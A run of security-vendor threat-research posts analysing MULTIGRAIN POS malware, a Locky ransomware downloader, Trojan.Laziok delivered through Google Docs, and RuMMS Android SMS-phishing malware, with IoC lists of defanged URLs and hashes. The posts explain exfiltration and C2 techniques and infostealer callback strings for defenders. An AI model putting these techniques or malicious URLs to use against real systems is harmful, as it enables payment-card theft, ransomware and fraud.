FireEye recently discovered a new variant of a point of sale (POS) malware family known as NewPosThings. This variant, which we call “MULTIGRAIN”, consists largely of a subset of slightly modified code from NewPosThings. The variant is highly targeted, digitally signed, and exfiltrates stolen payment card data over DNS. The addition of DNS-based exfiltration is new for this malware family; however, other POS malware families such as BernhardPOS and FrameworkPOS have used this technique in the past.

Using DNS for data exfiltration provides several advantages to the attacker. Sensitive environments that process card data will often monitor, restrict, or entirely block the HTTP or FTP traffic often used for exfiltration in other environments. While these common internet protocols may be disabled within a restrictive card processing environment, DNS is still necessary to resolve hostnames within the corporate environment and is unlikely to be blocked.

Specific Targeting

Several POS malware families will parse through running processes and scrape a large number of them in the hopes of locating card data. In contrast to that approach, MULTIGRAIN has been custom-engineered to target a specific point of sale process: multi.exe, associated with a popular back-end card authorization and POS (electronic draft capture) server software package. If multi.exe is not found on the infected host, the malware will not install and will simply delete itself. This shows that while developing or building their malware, the attackers had a very specific knowledge of the target environment and knew this process would be running.

Persistence

If the targeted POS process is running on the host and the malware is executed with a command line parameter designating “installation mode”, MULTIGRAIN copies itself to the hardcoded location “c:\windows\wme.exe” and installs a service with the properties shown in Figure 1.

Figure 1: Service properties used by MULTIGRAIN POS malware

Initial Beaconing

The malware collects the volume serial number and part of the MAC address and creates a hash of the concatenated value using the DJB2 hashing algorithm. The resulting hash is then combined with the computer name and a version number and all three components are then encoded with a custom Base32 encoding algorithm. The malware then makes a DNS query with this information to a hardcoded domain, notifying the attacker of a successful installation. The process is shown in Figure 2.

Figure 2. Construction of Installation Beacon

Memory-Scraping and Card Data Exfiltration

Once installed and executing, MULTIGRAIN begins scraping the memory of the targeted process for Track 2 card data, validating that data using the Luhn algorithm. Track 2 data will normally contain the PAN (Primary Account Number), Expiration Date, Service Code and optionally a CVV/CVC number, data which will typically be sufficient in most scenarios to attempt “card-present” and, and in some cases, “card-not-present” fraud.

Each Track 2 record is first encrypted with a 1024-bit RSA public key, pushed through the same custom Base32 encoding process as used in the installation beacon, and then stored in a buffer. Every five minutes, the malware checks this buffer to see if any card data is ready for exfiltration. If card data is present, the individual encrypted and encoded Track 2 data record for each card is sent over the network by means of a DNS query made by the malware. The process is shown in Figure 3.

Figure 3. Track 2 Card Data Encoding and Exfiltration

Base32 Encoding

Both the installation beacon and the stolen card data are encoded with an unusual encoding algorithm – Base32 – before being transmitted via DNS queries. The choice of Base32 is interesting as Base64 is better known and more widely used (for instance in the MIME standard used by email attachments). Using Base32 will actually result in the data taking up 20 percent more space than Base64, so the attackers were unconcerned with the efficiency of bandwidth.

One possible reason for selecting Base32 is the relative obscurity of the algorithm. Security and data loss prevention (DLP) products are more likely to detect Base64 encoding and in some cases can automatically decode the data, which could result in DLP devices identifying the exfiltration.

Code Reuse

Elements of the code from MULTIGRAIN show strong similarities to the POS malware family known as NewPosThings. Shared code elements include:

  • The code used to scrape a process for card data
  • The DJB2 hashing algorithm used as part of creating a system ID

Two other examples from binary disassembly are shown below: the “connect/3” network beacon (Figure 4 – seemingly unused in MULTIGRAIN) and similarities in the construction of the installation beacon (Figure 5).

Figure 4. “Connect/3” network beacon comparison between MULTIGRAIN and NewPosThings

Figure 5. Installation beacon comparison between MULTIGRAIN and NewPostThings

Digital Signature

As shown in Figure 6, this MULTIGRAIN sample is digitally signed with a certificate issued to the “AMO-K Limited Liability Company” with a Comodo root and intermediate certificate chain (serial number d0 8d 83 ff 11 8d f3 77 7e 37 1c 5c 48 2c ce 7b). The certificate was revoked on Oct. 14, 2015.

Figure 6: Digital certificate used to sign MULTIGRAIN sample

Conclusion

Organizations that process card data must remain vigilant against attackers intent on financial fraud. Many POS malware families are written to be fairly generic (for example, targeting any process that may contain payment card data). However, threat actors may operate with greater stealth, customizing malware for specific environments and using less common protocols or methods for data exfiltration.

Although MULTIGRAIN does not bring any new capabilities to the POS malware table, it does show that capable attackers can customize malware “on-the-fly” to target a specific environment. While exfiltration via DNS is not a new tactic, MULTIGRAIN demonstrates that organizations should monitor and review DNS traffic for suspicious or anomalous behavior.

MD5:

F924CEC68BE776E41726EE765F469D50

This post was first available on Visa Threat Intelligence, the first product available from the partnership between Visa Inc. and FireEye. Subscribers will gain access to a powerful web portal that distills the latest proprietary cyber intelligence relevant to payment systems into actionable information, including timely alerts on malicious actors, methods, trends in cyber-attacks, and in-depth forensic analysis from recent data beaches.  Contact your Visa Account Executive or email VisaThreatIntelligence@Visa.com for more information.

Follow The Money: Dissecting the Operations of the Cyber Crime Group FIN6

$
0
0

Cybercrime operations can be intricate and elaborate, with careful planning needed to navigate the various obstacles separating an attacker from a payout. Yet reports on these operations are often fragmentary, as the full scope of attacker activity typically occurs beyond the view of any one group of investigators.

FireEye Threat Intelligence and iSIGHT Partners recently combined our research to provide a unique and extensive look into the activities of one particular threat group: FIN6.

FIN6 is a cyber criminal group that steals payment card data for monetization from targets predominately in the hospitality and retail sectors. The group was observed aggressively targeting and compromising point-of-sale (POS) systems and making off with millions of payment card numbers. These card numbers were later sold on a particular underground “card shop,” potentially earning FIN6 hundreds of millions of dollars.

This report provides wide-ranging, end-to-end visibility into FIN6’s cybercrime operations, detailing initial intrusion, methods used to navigate the victim network, other tactics, techniques, and procedures (TTPs), and the sale of stolen payment card data in an underground marketplace.

The story of FIN6 shows how real-world threat actors operate.

Please join us for a webinar on Thursday, May 5 at 11:00am ET/8:00am PT. You can register here.

The video below offers an overview of the methods FIN6 uses.

New Downloader for Locky

$
0
0

Through DTI Intelligence analysis, We have been observing Locky malware rise to fame recently. Locky is ransomware that is aggressively distributed via downloaders attached in spam emails, and it may have surpassed the Dridex banking trojan in popularity. In previous campaigns, the ransomware was downloaded by a macro-based downloader or a JavaScript downloader. However, in April 2016, FireEye Labs observed a new development in the way this ransomware is downloaded onto a compromised system.

In a recent Locky spam campaign using ‘Photos’ as a theme (Figure 1), we saw a new binary being downloaded by the JavaScript found in the attached ZIP file, as seen in Figure 2. This JavaScript downloader reached out to “hxxp://mrsweeter.ru/87h78rf33g”.

Figure 1: Recent Locky spam campaign

Figure 2. Locky spam ZIP attachment containing JS downloader

New Downloader (MD5: c5ad81d8d986c92f90d0462bc06ac9c6)

The new downloader has a custom network communication protocol. In our tests, it only downloads the Locky ransomware as its payload. This malware seems to be in its early development stage as it only supports commands for download and execution of an executable and deletion of itself. This means the malware can also update its own binary, leading to the possiblity of more commands being supported.

The malware communicates with its command and control (C2) over HTTP using a custom encryption algorithm. The first beacon to the hard-coded C2 asks for a task to be executed by the malware. An example of the unencrypted message sent to C2 is formatted, as shown in Figure 3.

Figure 3. Raw message format

ID1 – derived from HDD Volume Serial Number
ID2 – 2222222222 (hard-coded value)
ID3 – random generated number
ID4 – derived from bit-masked OS version and system architecture
time – UTC time the message is created
type – getjob (hard-coded value)

This beacon string is encrypted with the custom algorithm shown in Figure 4 before sending it to its C2. The custom encryption is composed of XOR and bit shifts.

Figure 4. Custom string encryption

After encryption, an ‘A’ (0x41h) character is appended to the encrypted message. The beacon request is delivered via an HTTP POST request. In this sample, it reaches out to hxxp://raprockacademy.com/api, as shown in Figure 5.

Figure 5. Encrypted HTTP POST request and C2 response

The C2 server responds with an encrypted message that tells the malware what action to take. Decrypting the C2 response is possible with the Python code shown in Figure 6.

Figure 6. C2 reponse decryptor

The decrypted message shows a URL to download a binary and, in this case, an updated Locky binary.

Figure 7. Decrypted message

The ‘command’ field can be ‘UPDATE’, ‘NOTASKS’, and ‘DEL’ – ‘NOTASKS’ being no further instructions from the C2 for the moment and ‘DEL’ for deletion of the downloader from the victim machine through drop and execute of a batch file.

Further inspection of this malware reveals several small DLL files embedded in the binary. These DLLs may be used depending on the OS environment of the compromised system. The following is a brief description of the embedded DLLs:

1.  32-bit and 64-bit DLLs, which executes a file via the CreateProcessW API.
2.  64-bit binary used for bypassing User Account Control (UAC). Debug symbol path is not stripped in the binary:
            D:\Test\Build\AvoidUAC\x64\Release\Test64Shellcode.pdb
3.     64-bit binary which can elevate privileges for a specified process.

Locky DGA update

The Locky sample downloaded (MD5: 357c162a35c3623d1a1791c18e9f56e7) has updated its DGA. The DGA has the following differences:

  • TLD is not randomly generated and is picked from the following list: ["ru", "info", "biz", "click", "su", "work", "pl", "org", "pw", "xyz"]
  • Constant 0x2709a354 is no longer used
  • Introduced new constants: 0x1bf5, 0xd8efffff, 0x65cad

We provide an update to the shared DGA code from our previous blog, as shown in Figure 8.

Figure 8. Updated Locky Domain Generation Algorithm

Conclusion

The actors behind the Locky ransomware are actively seeking new ways to successfully install their malware on victim computers. That may be one of the reasons this new downloader is used and being introduced to the current distribution framework. This downloader can be a new platform for installing other malware (“Pay-per-Install”).

IoCs

Spam EML

  • 7b45833d87d8bd38c44cbaeece65dbbd04e12b8c1ef81a383cf7f0fce9832660
  • 9a0788ba4e0666e082e18d61fad0fa9d985e1c3223f910a50ec3834ba44cce10

MD5s

  • b0ca8c5881c1d27684c23db7a88d11e1
  • c5ad81d8d986c92f90d0462bc06ac9c6
  • ebf1f8951ec79f2e6bf40e6981c7dbfc
  • 357c162a35c3623d1a1791c18e9f56e72bcd76f6ef9f4cbcf5952f62b9bc8a08
  • b0ca8c5881c1d27684c23db7a88d11e1
  • c325dcf4c6c1e2b62a7c5b1245985083

URLs

  • mrsweeter.ru/87h78rf33g
  • 185.130.7.22/files/sBpFSa.exe
  • 185.130.7.22/files/WRwe3X.exe
  • slater.chat.ru/gvtg77996
  • hundeschulegoerg.de/gvtg77996
  • buhjolk.at/files/dIseJh.exe
  • buhjolk.at/files/aY5TFn.exe

PowerShell used for spreading Trojan.Laziok through Google Docs

$
0
0
Introduction

Through our multi-flow detection capability, we recently identified malicious actors spreading Trojan.Laziok malware via Google Docs. We observed that the attackers managed to upload the payload to Google Docs in March 2016. During the brief time it was live, users accessing the malicious page from Internet Explorer (versions 3 to 11) would have become the unwilling hosts for the infostealer payload without any security warning. After we alerted Google about its presence, they quickly cleaned it and the original URL involved in propagation also went down.

The Payload

Trojan.Laziok reportedly serves as a reconnaissance tool that attackers use to collect information about systems they have compromised. It has been seen previously in a cyber espionage campaign targeting the energy sector, particularly in the Middle East[i]. In that campaign, the malware was spread using spam emails with malicious attachments exploiting the CVE-2012-0158 vulnerability.

The techniques used for delivery in this case involve exploiting users running versions of Internet Explorer that support VBScript.

Attack Delivery Point

The attacker stored the first stage of the attack on the Polish domain hosting site cba[.]pl. As seen in Figure 1, the first stage initiates the attack by running obfuscated JavaScript from www.younglean. cba[.]pl/lean/.

Figure 1. Obfuscated code shown in the response

Once decoded, the JavaScript unpacks and runs vulnerability CVE-2014-6332 through VBScript execution in Internet Explorer (versions 3 to 11), exploiting the memory corruption vulnerability in Windows Object Linking and Embedding (OLE) Automation to bypass operating system security utilities and other protections and thus enabling attackers to enter into ”GodMode” function.  CVE-2014-6332 usage, along with GodMode privileges abuse, has been used as a combination since late 2014 via a known PoC[ii], as seen Figures 2a and 2b:

Figure 2a. CVE-2014-6332 usage

Figure 2b. Function call to runmumaa() after “GodMode” access changing the safemode flags

Next, the runmaa() function downloads the malicious payload from Google Docs through PowerShell. PowerShell is used to download malware and execute it inside defined %APPDATA% environment variable path via DownloadFile and ShellExecute commands. All VBScript instructions and PowerShell scripts are part of the obfuscated script inside document.write(unescape), shown in Figure 1.

PowerShell is also useful for bypassing anti-virus software because it is able to inject payloads directly in memory. We have previously discussed active PowerShell data stealing campaigns from Russia[iii]. It seems the technique is still popular among campaigns involving infostealers, and this one was able to evade Google Docs security checks. The payload download link from Google Docs – seen in Figure 3 showing the de-obfuscated code – fetched live malware for victims who ended up on the aforementioned Polish website.

Figure 3. Using PowerShell to fetch payload hosted on Google docs link

Payload Details

The downloaded payload is infostealer Trojan.Laziok, as evidenced by its callback trace and the presence of the following data:

00406471 PUSH 21279964.00414EED ASCII "open"
0040649C MOV EDX,21279964.004166A8 ASCII "idcontact.php?COMPUTER="
004064B1 MOV EDX,21279964.00415D6D ASCII "&steam="
004064D2 MOV EDX,21279964.00416D96 ASCII "&origin="
004064F3 MOV EDX,21279964.00416659 ASCII "&webnavig="
00406514 MOV EDX,21279964.00416B17 ASCII "&java="
00406535 MOV EDX,21279964.00415601 ASCII "&net="
00406556 MOV EDX,21279964.00414F76 ASCII "&memoireRAMbytes="
0040656B MOV EDX,21279964.0041628C ASCII "&diskhard="
0040658E MOV EDX,21279964.00414277 ASCII "&avname="
004065AF MOV EDX,21279964.00416BFC ASCII "&parefire="
004065D0 MOV EDX,21279964.0041474A ASCII "&install="
004065E5 MOV EDX,21279964.00414E12 ASCII "&gpu="
00406606 MOV EDX,21279964.004164B7 ASCII "&cpu="
00406659 MOV EDX,21279964.004170F9 ASCII "bkill.php"
004066B9 MOV EDX,21279964.00415B79 ASCII "0000025C00000C6B000008BB000006ED0000088900000453000004CE0000054100000B75"
004066ED MOV EDX,21279964.004149CD ASCII "install_info.php"
00406735 MOV EDX,21279964.00415951 ASCII "pinginfo.php"
00406772 MOV EDX,21279964.00416B6B ASCII "get.php?IP="
00406787 MOV EDX,21279964.0041463F ASCII "&COMPUTER="
0040679C MOV EDX,21279964.00416DF5 ASCII "&OS="
004067B1 MOV EDX,21279964.00415CB8 ASCII "&COUNTRY="
004067C6 MOV EDX,21279964.00416069 ASCII "&HWID="
004067DB MOV EDX,21279964.00414740 ASCII "&INSTALL="
004067F0 MOV EDX,21279964.00415BE3 ASCII "&PING="
00406805 MOV EDX,21279964.004158E2 ASCII "&INSTAL="
0040681A MOV EDX,21279964.00414D3E ASCII "&V="
0040682F MOV EDX,21279964.00414E5D ASCII "&Arch="
00406872 MOV EDX,21279964.00414166 ASCII "post.php"
00406899 MOV EDX,21279964.00414EB0 ASCII "*0"

Above instructions of the payload, when unpacked, highlight the typical traits of Trojan.Laziok. The infostealer tries to collect information about computer name, CPU details, RAM size, location (country), and installed software and antivirus (AV). Our MVX engine also shows that it attempts to access popular AV files, such as installer files for Kaspersky, McAfee, Symantec and Bitdefender. It also blends in by copying itself to well-known folders and processes such as:

C:\Documents and Settings\admin\Application Data\System\Oracle\smss.exe

The payload attempts to call back to a known bad Polish server [hxxp://]193.189.117[.]36]

We observed the first instance of this attack on March 13, 2016. The malware was available on Google Docs until we alerted Google about its presence. Users are not usually able to download malicious content from Google Docs because Google actively scans and blocks malicious content. The fact that this sample was available and downloadable on Google Docs suggests that the malware evaded Google’s security checks. Following our notification, Google promptly removed the malicious file and it can no longer be fetched.

Conclusion

FireEye’s multi-flow detection mechanism catches this at every level, from the point of entry to the callback – and the malware is not able to bypass FireEye sandbox security. PowerShell data stealing campaigns have also been observed spreading through document files with embedded macros, so corporate environments need to be extra careful regarding the policy and regulation of PowerShell usage – especially since the abuse can involve some trusted sources that sometimes have exemptions, with whitelists from some security vendors being one example. Or they can keep using FireEye.

 

 

[i] http://www.symantec.com/connect/blogs/new-reconnaissance-threat-trojanlaziok-targets-energy-sector
[ii] http://blog.trendmicro.com/trendlabs-security-intelligence/a-killer-combo-critical-vulnerability-and-godmode-exploitation-on-cve-2014-6332/
[iii] https://www.fireeye.com/blog/threat-research/2015/12/uncovering_activepower.html

 

 

RuMMS: The Latest Family of Android Malware Attacking Users in Russia Via SMS Phishing

$
0
0
Introduction

Recently we observed an Android malware family being used to attack users in Russia. The malware samples were mainly distributed through a series of malicious subdomains registered under a legitimate domain belonging to a well-known shared hosting service provider in Russia. Because all the URLs used in this campaign have the form of hxxp://yyyyyyyy[.]XXXX.ru/mms.apk (where XXXX.ru represents the hosting provider’s domain), we named this malware family RuMMS.

To lure the victims to download the malware, threat actors use SMS phishing – sending a short SMS message containing a malicious URL to the potential victims. Unwary users who click the seemingly innocuous link will have their device infected with RuMMS malware. Figure 1 describes this infection process and the main behaviors of RuMMS.

Figure 1. Overview of the RuMMS campaign and behaviors

On April 3, 2016, we still observed new RuMMS samples emerging in the wild. The earliest identified sample, however, can be traced back to Jan. 18, 2016. Within this time period, we identified close to 300 samples belonging to this family (all sample hashes are listed in the Appendix).

After landing on the victim’s phone, the RuMMS apps will request device administrator privileges, remove their icons to hide themselves from users, and remain running in the background to perform a series of malicious behaviors. So far we have identified the following behaviors:

●      Sending device information to a remote command and control (C2) server.

●      Contacting the C2 server for instructions.

  • Sending SMS messages to financial institutions to query account balances.
  • Uploading any incoming SMS messages (including the balance inquiry results) to the remote C2 server.
  • Sending C2-specified SMS messages to phone numbers in the victim’s contacts.
  • Forward incoming phone calls to intercept voice-based two-factor authentication.

Each of these behaviors is under the control of the remote C2 server. In other words, the C2 server can specify the message contents to be sent, the time period in which to forward the voice call, and the recipients of outgoing messages. As part of our investigation into this malware, we emulated an infected Android device in order to communicate with the RuMMS C2 server. During one session, the C2 server commanded our emulated device to send four different SMS messages to four different phone numbers, all of which were associated with Russian financial institutions. At least three of the messages were intended to check a user’s account balance at the institution (we could not confirm the purpose of the fourth).Through additional research, we identified several forum posts where victims complained of funds (up to 600 rubles) were transferred out of their accounts after RuMMS infected their phones.

We do not know exactly how many people have been infected with RuMMS malware. However, our data suggests that there have been at least 2,729 infections between January 2016 and early April 2016, with a peak in March of more than 1,100 infections.

Smishing: The Major Way To Distribute RuMMS

We have not observed any instances of RuMMS on Google Play or other online app stores. Smishing (SMS phishing) is currently the primary way threat actors are distributing the malware. The process starts when an SMS phishing message arrives at a user’s phone. An example SMS message is shown in Figure 1. The message translates roughly to“ You got a photo in MMS format: hxxp://yyyyyyyy.XXXX.ru/mms.apk.”

So far we identified seven different URLs being used to spread RuMMS in the wild. All of the URLs reference the file “mms.apk” and all use the domain “XXXX.ru”, which belongs to a top five shared hosting platform in Russia (the domain itself has been obfuscated to anonymize the provider).

The threat actors registered at least seven subdomains through the hosting provider, each consisting of eight random-looking characters (asdfgjcr, cacama18, cacamadf, konkonq2, mmsmtsh5, riveroer, and sdfkjhl2.) As of this writing, no files were hosted at any of the links. The threat actors seem to have abandoned these URLs and might be looking into other ways to reach more victims.

Use of a shared hosting service to distribute malware is highly flexible and low cost for the threat actors. It is also much harder for network defenders or researchers to track a campaign where the infrastructure is a moving target. Many top providers in Russia offer cheap prices for their shared hosting services, and some even provide free 30-day trial periods. Threat actors can register subdomains through the hosting provider and use the provider’s services for a short-period campaign. A few days later they can cancel the trial and do not need to pay a penny. In addition, these out-of-the-box hosting services usually provide better infrastructure than the attackers could manage to construct (or compromise) themselves.

RuMMS Code Analysis

All RuMMS samples share the same behaviors, major parts of which are shown in Figure 1. However, the underlying code can be quite different in that various obfuscation mechanisms were adopted to evade detection by anti-virus tools. We used a sample app named “org.starsizew” with an MD5 of d8caad151e07025fdbf5f3c26e3ceaff to analyze RuMMS’s code.

Several of the main components of RuMMS are shown in Figure 2. The activity class “org.starsizew.MainActivity” executes when the app is started. It first starts another activity defined in “org.starsizew.Aa” to request device administrator privileges, and then calls the following API of “android.content.pm.PackageManager” (the Android package manager to remove its own icon on the home screen in order to conceal the existence of RuMMS from the user:

            setComponentEnabledSetting(MainActivity.class, 2, 1)

At the same time, ”org.starsizew.MainActivity” will start the main service as defined in “org.starsizew.Tb”, and use a few mechanisms to keep the main service running continuously in the background. The class “org.starsizew.Ac” is designed for this purpose; its only task is to check if the main service is running, and restart the main service if the answer is no. The class “org.starsizew.Tb” also has a self-monitoring mechanism to restart itself when its own onDestroy API is triggered. Other than that, its major functionality is to collect private device information, upload it to a remote C2 server, and handle any commands as requested by the C2 server. All those functions are implemented in asynchronous tasks by “org.starsizew.i”.

Figure 2. Android Manifest File of RuMMS

The class “org.starsizew.Ma” is registered to intercept incoming SMS messages, the arrival of which will trigger the Android system to call its “onReceive” API. Its major functionality is also implemented through the call of the asynchronous task (“org.starsizew.i”), including uploading the incoming SMS messages to the remote C2 server and executing any commands as instructed by the remote attacker.

C2 Communication

The C2 communication includes two parts: sending information to the remote HTTP server and parsing the server’s response to execute any commands as instructed by the remote attackers. The functionality for these two parts is implemented by doInBackground and onPostExecute respectively, two API methods of “android.os.AsyncTask” as extended by class “org.starsizew.i”.

Figure 3. Method doInBackground: to send information to remote C2 server

As seen from the major code body of method doInBackground shown in Figure 3 (some of the original classes and methods are renamed for easier understanding), there are three calls to HttpPost with different contents as parameters. At line 5, local variable v4 specifies the first parameter url, which can be changed by the remote C2 server later. These URLs are all in the form of “http://$C2.$SERVER.$IP/api/?id=$NUM”. The second parameter is a constant string “POST”, and the third parameter is a series of key-value pairs to be sent, assembled at runtime. The value of the first item, whose key is “method” (line 7), indicates the type of the contents: install, info and sms.

The first type of content, starting with “method=install”, will be sent when the app is started for the first time, including the following device private information:

  • Victim identifier
  • Network operator
  • Device model
  • Device OS version
  • Phone number
  • Device identifier
  • App version
  • Country

Figure 4 is an example of this string as seen by the FireEye Mobile Threat Prevention platform.

Figure 4. Example HTTP post message

The second type of information will be sent periodically to indicate that the device is alive. It only has two parts, the method indicated by word “info” and the victim identifier. The third type of information will be sent when RuMMS intercepts any SMS messages, including the balance inquiry results when it contacts the SMS code of a particular financial service.

Method onPostExecute parses the response from the above HTTP session and executes the commands provided by the remote attacker. As seen from the code in Figure 5, the commands RuMMS supports right now include:

  • install_true: to modify app preference to indicate that the C2 server received the victim device’s status.
  • sms_send: to send C2-specified SMS messages to C2-specified recipients.
  • sms_grab: to upload periodically the SMS messages in the inbox to C2 server.
  • delivery: to deliver specified text to all victim’s contacts (SMS worming).
  • call_number: to forward phone calls to intercept voice based two-factor authentication.
  • new_url: to change the URL of the C2 server in the app preference.
  • ussd: to call a C2-specified phone number.

Figure 5. Method onPostExecute: to handle instructions from remote C2

Figure 6 shows an example response sent back from one C2 server. Note that inside this single response, there is one “install_true” command, one “sms_grab” command and four “sms_send” commands. With the four “sms_send” commands, the messages as specified in the key “text” will be sent immediately to the specified short numbers. Our analysis suggests that the four short numbers are associated with Russian financial institutions, presumably where a victim would be likely to have accounts.

Figure 6. Example Response in JSON format

In particular, short number “+7494” is associated with a payment service provider in Russia. The provider’s website described how the code 7494 can be used to provide a series of payment-related capabilities. For example, sending text “Balance” will trigger a response with the victim’s wallet balance. Sending text “confirm 1” will include proof of payment. Sending text “call on” will activate the USSD payment confirmation service.

During our investigation, we observed the C2 server sending multiple “balance” commands to different institutions, presumably to query the victim’s financial account balances. RuMMS can upload responses to the balance inquiries (received via SMS message) to the remote C2 server, which can send back additional commands to be sent from the victim to the provider’s payment service. These could include resetting the user’s PIN, enabling or disabling various alerts and confirmations, and confirming the user’s identity.

RuMMS Samples, C2, Hosting Sites, Infections and Timeline

In total we captured 297 RuMMS samples, all of which attempt to contact an initial C2 server that we extracted from the app package. Figure 7 lists the IP addresses of these C2 servers, the number of RuMMS apps that connect to each of them, and the example URL used as the first parameter of the HttpPost operation (used in the code of Figure 3). This indicates that multiple C2 servers were used in this campaign, but one (37.1.207.31) was the most heavily used.

Figure 7. RuMMS samples and C2 servers

Figure 8 shows how these samples, C2 servers and hosting websites are related to each other, including when they were compiled or observed. In the quadrant, the smaller boxes in blue-gray represent particular apps in the RuMMS family, while the bigger boxes in deep-blue represent C2 servers used by some RuMMS apps. The dotted arrows represent the use of a particular C2 server by a specific app to send information and fetch instructions. In this figure we have 11 RuMMS samples, all of which were hosted on the website as shown in the “y” axis. The dates on the “x” axis show the dates when we first saw these apps in the wild. This figure demonstrates the following interesting information:

The time range when threat actors distributed RuMMS on those shared-hosting websites is from January 2016 to March 2016.

  • Threat actors used different websites to host different payloads at different times. This kind of “moving target” behavior made it harder to track their actions.
  • The same websites have hosted different RuMMS samples at different dates.
  • C2 servers are shared by multiple samples. This matches our observations of C2 servers as shown in Figure 7.

Figure 8. RuMMS samples, hosting sites, C2 servers from Jan. 2016 to Mar. 2016

We do not know exactly how many people have been infected with RuMMS malware; however, our data suggests that there are at least 2,729 infections with RuMMS samples from January 2016 to early April 2016.

Figure 9 shows the number of RuMMS infections recorded in the last four months. When we first observed the malware in January, we recorded 380 infections. In February, we recorded 767 infections. In March, it peaked at 1,169 infections. In April, at the time of writing this post, we recorded 413 RuMMS infections. Although the propagation trend seems to be slowing down a bit, the figure tells us that RuMMS malware is still alive in the wild. We continue to monitor its progress.

 

Figure 9. RuMMS infections from Jan. 2016 to Apr. 15, 2016

Conclusion

Smishing (SMS phishing) offers a unique vector to infect mobile users. The recent RuMMS campaign shows that Smishing is still a popular means for threat actors to distribute their malware. In addition, the use of shared-hosting providers adds flexibility to the threat actor’s campaign and makes it harder for defending parties to track these moving targets.

Fortunately, FireEye Mobile Threat Prevention platform can recognize the malicious SMS and networking behaviors used by these RuMMS samples, and help us quickly identify the threat. To protect yourself from these threats, FireEye suggests that users:

  • Take caution before clicking any links where you are not sure about the origin.
  • Don’t install apps outside the official app store.

To detect and defend against such attacks, we advise our customers to deploy our mobile security solution, FireEye MTP/MSM. This helps our clients gain visibility into threats in their user base, and also enables them to proactively hunt down devices that have been compromised. In addition, we advise our customers with NX appliances to ensure that Wi-Fi traffic is scanned by NX appliances to extend coverage to mobile devices.

Appendix: RuMMS Sample Hashes

016410e442f651d43a7e28f72be2e2ef

 01d95061091d4f6f536bada821461c07

 0328121ca8e0e677bba5f18ba193371c

 03a442b0f7c26ef13a928c7f1e65aa23

 03c85cb479fd9031504bba04c2cefc96

 053c247a1c176af8c9e42fe93fb47c9d

 064799b5c74a5bae5416d03cf5ff4202

 066e171fc083c5e21ac58026870a4ae8

 0749e775f963fdab30583914f01486e3

 081b04697f96568356d7b21ac946fb7c

 0927b599d9599dcd13b6ef5f899ef4d9

 0964ee11f6d19c2297bce3cb484a2459

 0a22ceac6a0ee242ace454a39bff5e18

 0a3b9c27b539498b46e93dbdcfb3de1e

 0abf7a57855c2312661fdc2b6245eef8

 0c3dbcffb91d154b2b320b2fce972f39

 0c75764d172364c239fc22c9c3e21275

 0dd1d8d348a3de7ed419da54ae878d37

 0dd40d2f4c90aec333445112fb333c88

 0e89415cdd06656d03ef498fd1dd5e9b

 0e8ef8108418ca0547b195335ee1dd2c

 0ea83ffc776389a19047947aba5b4324

 0f280e86268da04dc2aa65b03f440c1a

 0f5a6b34e952c5c44aa6f4a5538a6f2b

 0fa1ffbcfe0afc6a4a57fed513a72eb6

 104859f80028792fbd3a0a0ea1e6fd78

 10c58dd41d95a81b1043059563860c1c

 11d425602d3c8311d1e18df35db1daa3

 120561bfced94cc1ce5cda03b203dbf8

 128576fbdb7d2980c5a52cd3286bcca8

 14a8246474ed819a4dfcc3cb06e98954

 14c7f0dc55b5dd0c7e39f455baae3089

 1693f424742279a8678322a012222a02

 16b778921b6db27a2af23dd8ce1fac3e

 16ec62c1d7d4ac3f3d7d743fc1e21bf6

 1711081b5ba5c3941ae01d80819c7530

 177af9700bcc8b7c8c131b662e8cdda8

 17bfe26e9a767c83df2aab368085e3c2

 17d083988dd5e6d9c2517899ae30bb02

 1850c020edafcf8254279e352ce33da9

 18d1b845b2ee1960b304ab2fd3bfe11b

 1b4b6bf1e40d5954b34a815d1438efd9

 1cbedd5cc8e9b59f90ec81a5aec0239f

 1cead79dfdaee9d7eb914a5b13a323ea

 1dc8e18e610fd921ffa638b3f51de4b2

 1ed3c0158eb960bb47847596a69a744c

 2177a3094dd06f9d777db64364d3fc2c

 220fc807884acfcd703596994e202f21

 244b965d3816ac828d21c04bcf0519a4

 24f23fe808ba3f90a7a48eae37ce259d

 2745bc6f165ae43f1edf5cd1e01db2c5

 2802552e2aa5491ebbf28bfef85618cb

 29a8eef1b304d53f303d03ba6994ed32

 2a1c02bd4263a4e1cb6f648a9da59429

 2a6c086c589d1b0a7d6d81c4e4c70282

 2ac5e8e2fd8050330863875d5018cb59

 2c200cfcc5f4121fb70b1c152357225b

 2cb75f46b901c17b2f0a9cb486933d65

 2cd1908f4846e81e92f82684d337e858

 2ce248b19c30a9fed4cd813c23831d7a

 2cf5b053bf51e9ff8ea653da5523b5f1

 2e44ffbaa24c1203df218be1cc28a9e5

 2e9fcd26fdeeed19f0de865298d59f2e

 308bec5d52d55c00aff0b561e7975bdf

 30a8c03a7d6a489da047443938e2aa20

 30c1a1a7417598fa8f23572f0f090866

 30f2b0edd191d1465bac11553d60f761

 3103bd49786d52c920e12303921bd2f1

 3131d58ace4f3485dcc2581be3fcfb42

 315a713c65baf5390fcf4232df3d1669

 318513f9f14fbf78ec037b62b221c91b

 3199b7e9b27c1aa619bc6959c6eab458

 31eddefcadb1d4a6bbc55e610d085638

 34788c0c80687e1488d3c9b688de9991

 34e8dfc3d5fe5a936d556ac79e53412f

 356393e8c85864fa2e31e30d28c13067

 35666c9ef8d3d81d8641578259982e57

 37506bcd79e0a39d56edda2f0713ce34

 38b9c800c9787ea6de3f5a9436444435

 391a74f46c7f7c34e98be38228fc94b6

 3a0baa509a54359d10696d995dfe783e

 3abe743871688eb542a36bdd4f5ba196

 3b2dda7dafbc3f690f179999b367f743

 3b39743b98e7223c93f15026c009e2ed

 3d3dac2656f5850d6e2cababc06edd23

 3d4e135e647fba30e67415e5ebc5af42

 3de3c1ff2db0f75d18c10c1d682596a6

 3f9376bd042b5c9b111dde1b460ab9b5

 40f7cec380c6904bbeaac5c42bc99fb6

 412e4f59e3a7a7d870581e83bffa33d1

 41b946bf78606d4f94a7206f024914bf

 422fc3634a8a575945fc96bd85465275

 4294589c588b577529150b01ce588a13

 437db1d8d84e245875064ba7cccc9ae0

 44a56e288d906cbfec85f6715554f83b

 472187a7eba0fd0479130711df34a409

 4827e46a2382fdfa2847db0d376c2c52

 48378433f79ac304d0bb86ee6f99958e

 4841a521f95ea744243566cc69904bd1

 4aa78398d9a927d2c67bf6a5fb0c8db8

 4b478ad35ad285ff4ff2623cb8c63ff7

 4be9cb7e3cdab4766411a0d2506a2cf7

 4d7ce984313b06835b72a4e6ad6e61fa

 4e60269982182b1cb8139dd5159a6b78

 4ed59658844835a222e09c6ca5701bf8

 4eda51773b46975d47b8932fee4cd168

